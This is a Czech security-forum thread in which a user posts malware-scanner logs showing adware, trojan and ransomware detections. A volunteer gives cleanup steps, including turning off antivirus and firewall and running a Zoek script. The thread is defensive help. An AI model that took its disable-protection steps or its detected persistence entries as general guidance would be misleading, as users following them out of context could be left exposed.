[#] Klíč smazán po restartu: HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
[-] Klíč smazán: HKLM\SOFTWARE\Classes\driverscanner
[-] Klíč smazán: HKLM\SOFTWARE\Classes\ppsmb
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\driverscanner
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\ppsmb
[-] Klíč smazán: HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5E6A8DA1-5731-465B-B036-B9E16EF26CAC}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
[-] Klíč smazán: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\GlobalUpdate
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\PPStream
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\INSTALLPATH\STATUS
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\mtPlusdax
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer
[#] Klíč smazán po restartu: HKCU\Software\GlobalUpdate
[#] Klíč smazán po restartu: HKCU\Software\PPStream
[#] Klíč smazán po restartu: HKCU\Software\INSTALLPATH\STATUS
[#] Klíč smazán po restartu: HKCU\Software\mtPlusdax
[-] Klíč smazán: HKLM\SOFTWARE\GlobalUpdate
[-] Klíč smazán: HKLM\SOFTWARE\SimpleFiles
[-] Klíč smazán: HKLM\SOFTWARE\SupDp
[-] Klíč smazán: HKLM\SOFTWARE\Uniblue
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Uniblue\DriverScanner
[#] Klíč smazán po restartu: HKLM\SOFTWARE\SUPDP
[-] Klíč smazán: HKLM\SOFTWARE\mtPlusdax
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[#] Klíč smazán po restartu: [x64] HKCU\Software\GlobalUpdate
[#] Klíč smazán po restartu: [x64] HKCU\Software\PPStream
[#] Klíč smazán po restartu: [x64] HKCU\Software\INSTALLPATH\STATUS
[#] Klíč smazán po restartu: [x64] HKCU\Software\mtPlusdax
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Klíč smazán po restartu: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Klíč smazán po restartu: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Klíč smazán: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
[-] Hodnota smazána: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gpuminer]
[-] Hodnota smazána: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [vProt]
[-] Klíč smazán: HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
[#] Klíč smazán po restartu: [x64] HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
***** [ Prohlížeče ] *****
[-] [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default] [favicon_url] Smazáno: hxxp://www.mystartsearch.com/webfavicon.ico
[-] [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default] [extension] Smazáno: fcfenmboojpjinhpgggodefccipikbpd
*************************
:: "Tracing" klíče smazány
:: Winsock nastavení vyčištěno
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [11335 Bajty] - [15/03/2017 17:51:07]
C:\AdwCleaner\AdwCleaner[S0].txt - [10932 Bajty] - [15/03/2017 17:24:58]
C:\AdwCleaner\AdwCleaner[S1].txt - [11008 Bajty] - [15/03/2017 17:50:27]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [11557 Bajty] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.2 (03.10.2017)
Operating System: Windows 10 Home x64
Ran by Nekut (Administrator) on 15.03.2017 at 17:58:58,67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 0
Registry: 1
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl\\Default (Registry Value)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 15.03.2017 at 18:00:38,60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 18:04
Logovací soubor: prt.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1509
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 424435
Uplynulý čas: 5 min, 0 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 1
Trojan.Boaxxe.Gen, HKU\S-1-5-21-2417313614-488722605-2671369154-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|EJCZTION, Smazání při restartu, [18446], [262116],1.0.1509
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)
Soubor: 1
PUP.Optional.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\AGENT.DAT, Smazání při restartu, [2399], [360491],1.0.1509
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Webová stránka : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com
Operační systém : Windows 10 (10.0.14393) 64 bits version
Spuštěno : Normální režim
Uživatel : Nekut [Práva správce]
Started from : C:\Users\Nekut\Downloads\RogueKillerX64.exe
Mód : Prohledat -- Datum : 03/15/2017 18:32:54 (Duration : 00:21:11)
¤¤¤ Procesy : 0 ¤¤¤
¤¤¤ Registry : 11 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458} -> Nalezeno
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Nalezeno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Nalezeno
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Nalezeno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{2745AA29-3952-43AA-B153-6B58BDAF514D}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Nalezeno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{25CFBDAA-1221-403A-AB6F-ED4028F32280}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Nalezeno
¤¤¤ Úlohy : 5 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\GFQtQALtXtjqpHeY4.job -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Nalezeno
[Suspicious.Path] %WINDIR%\Tasks\wHAbZSf.job -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Nalezeno
[Suspicious.Path] \GFQtQALtXtjqpHeY4 -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Nalezeno
[Suspicious.Path] \ProgramDataUpdater -- "C:\windows\pdusvr.exe" -> Nalezeno
[Suspicious.Path] \wHAbZSf -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Nalezeno
¤¤¤ Soubory : 5 ¤¤¤
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.102.217.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.103.32.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.91.22.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.99.9.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe -> Nalezeno
¤¤¤ WMI : 0 ¤¤¤
¤¤¤ Soubor HOSTS : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Nahrán) ¤¤¤
¤¤¤ Webové prohlížeče : 1 ¤¤¤
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWqICWRlg5p-TqszN326G3dy3mHYlJU_leL3IAiGvFzeaOhUIyCJcFE286UNTO4eZPO86PKEGCfrynUmXb3uq_pSnNua3I7BZYgy6kJMdsqTokNPy2WiG_-BWzOIW7ddYj86VlhSK030NLtwh40HfLYPFfyklC09xHt43i2BpT] -> Nalezeno
¤¤¤ Kontrola MBR : ¤¤¤
+++++ PhysicalDrive0: ST1000DM003-1ER162 +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 199434 MB
4 - Basic data partition | Offset (sectors): 409600000 | Size: 753869 MB
User = LL1 ... OK
User = LL2 ... OK
- jaro3
- člen Security týmu
-
Guru Level 15
- Příspěvky: 43113
- Registrován: červen 07
- Bydliště: Jižní Čechy
- Pohlaví:
- Stav:
Offline
Re: Prosím o kontrolu logu
Zavři všechny programy a prohlížeče. Deaktivuj antivir a firewall.
Prosím, odpoj všechny USB (kromě myši s klávesnice) nebo externí disky z počítače před spuštěním tohoto programu.
Spusť znovu RogueKiller ( Pro Windows Vista nebo Windows 7, klepni pravým a vyber "Spustit jako správce", ve Windows XP poklepej ke spuštění).
- klikni na „Start Scan“. V novém okně nic neměň a klikni dole na „Start Scan“,
po jeho skončení - vše zatrhni (dej zatržítka vlevo od nálezů , do bílých políček)
- pak klikni na "Remove Selected"
- Počkej, dokud Status box nezobrazí " Removal finished, please review result "
- Klikni na "Open report " a pak na " Open TXT“ a zkopíruj ten log a vlož obsah té zprávy prosím sem. Log je možno nalézt v C:\ProgramData\RogueKiller\Logs - Zavři RogueKiller.
Vypni antivir i firewall.
Stáhni
Zoek.exe
http://download.bleepingcomputer.com/smeenk/
klik nahoře vpravo na .rar-file
a uloz si ho na plochu.
Zavři všechny ostatní programy , okna i prohlížeče.
Spusť Zoek.exe ( u win vista , win7, 8 klikni na něj pravým a vyber : „Spustit jako správce“
-pozor , náběh programu může trvat déle.
Do okna programu vlož skript níže:
klikni na Run Script
Program provede sken , opravu, sken i oprava může trvat i více minut ,je třeba posečkat do konce. Do okna neklikej!
Program nabídne restart , potvrď .
Po restartu se může nějaký čas ukázat pouze černá plocha , to je normální. Je třeba počkat až se vytvoří log. Ten si můžeš uložit třeba do dokumentů , jinak se sám ukládá do:
C:\zoek-results.log
Zkopíruj sem celý obsah toho logu.
ještě jednou mbam.
+
Vlož nový log z HJT + informuj o problémech
Prosím, odpoj všechny USB (kromě myši s klávesnice) nebo externí disky z počítače před spuštěním tohoto programu.
Spusť znovu RogueKiller ( Pro Windows Vista nebo Windows 7, klepni pravým a vyber "Spustit jako správce", ve Windows XP poklepej ke spuštění).
- klikni na „Start Scan“. V novém okně nic neměň a klikni dole na „Start Scan“,
po jeho skončení - vše zatrhni (dej zatržítka vlevo od nálezů , do bílých políček)
- pak klikni na "Remove Selected"
- Počkej, dokud Status box nezobrazí " Removal finished, please review result "
- Klikni na "Open report " a pak na " Open TXT“ a zkopíruj ten log a vlož obsah té zprávy prosím sem. Log je možno nalézt v C:\ProgramData\RogueKiller\Logs - Zavři RogueKiller.
Vypni antivir i firewall.
Stáhni
Zoek.exe
http://download.bleepingcomputer.com/smeenk/
klik nahoře vpravo na .rar-file
a uloz si ho na plochu.
Zavři všechny ostatní programy , okna i prohlížeče.
Spusť Zoek.exe ( u win vista , win7, 8 klikni na něj pravým a vyber : „Spustit jako správce“
-pozor , náběh programu může trvat déle.
Do okna programu vlož skript níže:
Kód: Vybrat vše
autoclean;
emptyclsid;
iedefaults;
FFdefaults;
CHRdefaults;
emptyalltemp;
resethosts;
klikni na Run Script
Program provede sken , opravu, sken i oprava může trvat i více minut ,je třeba posečkat do konce. Do okna neklikej!
Program nabídne restart , potvrď .
Po restartu se může nějaký čas ukázat pouze černá plocha , to je normální. Je třeba počkat až se vytvoří log. Ten si můžeš uložit třeba do dokumentů , jinak se sám ukládá do:
C:\zoek-results.log
Zkopíruj sem celý obsah toho logu.
ještě jednou mbam.
+
Vlož nový log z HJT + informuj o problémech
Při práci s programy HJT, ComboFix,MbAM, SDFix aj. zavřete všechny ostatní aplikace a prohlížeče!
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Re: Prosím o kontrolu logu
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21:21:58, on 15.03.2017
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.14393.0953)
Boot mode: Normal
Running processes:
C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
C:\Users\Nekut\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\acwebbrowser.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Users\Nekut\Downloads\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,SearchAssistant = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
